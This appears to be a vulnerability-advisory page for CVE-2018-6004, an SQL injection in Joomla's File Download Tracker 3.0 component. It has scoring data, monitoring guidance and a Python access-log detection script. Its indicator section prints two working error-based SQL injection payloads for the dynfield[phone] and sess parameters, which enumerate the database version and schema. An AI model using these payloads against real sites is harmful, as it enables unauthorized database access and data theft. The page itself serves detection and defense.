CVE-2018-6004
published 2018-02-17

CVE-2018-6004: SQL Injection exists in the File Download Tracker 3.0 component for Joomla! via the dynfield[phone] or sess parameter.

Priority: P263 | critical | 9.8 | CVSS 3.0
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 2.70% (84.1th percentile)

Affected

1 range
Vendor | Product | Version range | Fixed in
techsolsystem | file_download_tracker | |

Detection & IOCs (extracted from sources)

url: http://localhost/[PATH]/index.php?dynfield[phone]=[SQL]&option=com_dtracker&task=save
url: http://localhost/[PATH]/index.php?option=com_dtracker&layout=download&sess=[SQL]
command: dynfield[phone]=%251%2527%2520AND%2520(SELECT%204323%20FROM(SELECT%20COUNT(*),CONCAT(version(),(SELECT%20(ELT(4323=4323,1))),database(),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%2527%2525%2527%3D%2527
command: sess=1' and(select 1 FROM(select count(*),concat((select (select concat(database(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -
  • Monitor HTTP requests to Joomla index.php containing 'option=com_dtracker&task=save' with a 'dynfield[phone]' parameter containing SQL metacharacters (quotes, AND, SELECT keywords).
  • Monitor HTTP requests to Joomla index.php containing 'option=com_dtracker&layout=download' with a 'sess' parameter containing SQL metacharacters (quotes, AND, SELECT keywords).
  • The SQL injection payloads target INFORMATION_SCHEMA.PLUGINS and information_schema.tables to enumerate database version and schema — alert on these strings appearing in query parameters.
  • Affected version is specifically File Download Tracker 3.0 for Joomla!; detections scoped to the 'com_dtracker' component parameter are version-specific and may not apply to patched or differently-named forks.
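
One way to turn the monitoring notes above into an access-log filter, as an added example (not code from this page's sources or from the component's vendor). The helper names, the combined-log request format and the sample lines are assumptions constructed for illustration; values are URL-decoded repeatedly because the quoted dynfield[phone] payload is double-encoded (%2527).

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Indicators from the detection notes: quotes, AND/SELECT, INFORMATION_SCHEMA.
SQLI = re.compile(r"['\"]|\b(?:and|select)\b|information_schema", re.I)
# (routing key, value) -> parameter to inspect on that com_dtracker route.
ROUTES = {("task", "save"): "dynfield[phone]", ("layout", "download"): "sess"}
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def fully_decode(value, max_rounds=3):
    """Undo nested URL encoding (%2527 -> %27 -> ') for a bounded number of rounds."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def check_request(target):
    """Return the flagged parameter name, or None when the request looks clean."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if "com_dtracker" not in query.get("option", []):
        return None  # detection is scoped to this component only
    for (key, expected), param in ROUTES.items():
        if expected not in query.get(key, []):
            continue
        if any(SQLI.search(fully_decode(v)) for v in query.get(param, [])):
            return param
    return None

def scan(lines):
    """Yield (line_number, parameter) for each flagged access-log line."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        hit = check_request(match.group(1)) if match else None
        if hit:
            yield number, hit

# Constructed sample lines (documentation IPs, harmless probe strings).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Feb/2018:10:00:00 +0000] "GET /index.php?option=com_dtracker&layout=download&sess=ab12cd34 HTTP/1.1" 200 512',
    '192.0.2.11 - - [17/Feb/2018:10:00:05 +0000] "GET /index.php?option=com_dtracker&layout=download&sess=1%27%20and%201%3D1 HTTP/1.1" 500 0',
    '192.0.2.12 - - [17/Feb/2018:10:00:09 +0000] "GET /index.php?dynfield[phone]=1%2527%2520AND%25201&option=com_dtracker&task=save HTTP/1.1" 500 0',
    '192.0.2.13 - - [17/Feb/2018:10:00:12 +0000] "GET /index.php?option=com_content&q=select%20a%20plan HTTP/1.1" 200 900',
    '192.0.2.14 - - [17/Feb/2018:10:00:15 +0000] "GET /index.php?dynfield[phone]=%2B1-555-0100&option=com_dtracker&task=save HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for number, param in scan(SAMPLE_LOG):
        print(f"line {number}: SQL metacharacters in {param}")
```

Access logs record only the query string, so parameters submitted in a POST body need request-body logging or a WAF rule that applies the same logic.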

CVSS provenance

nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P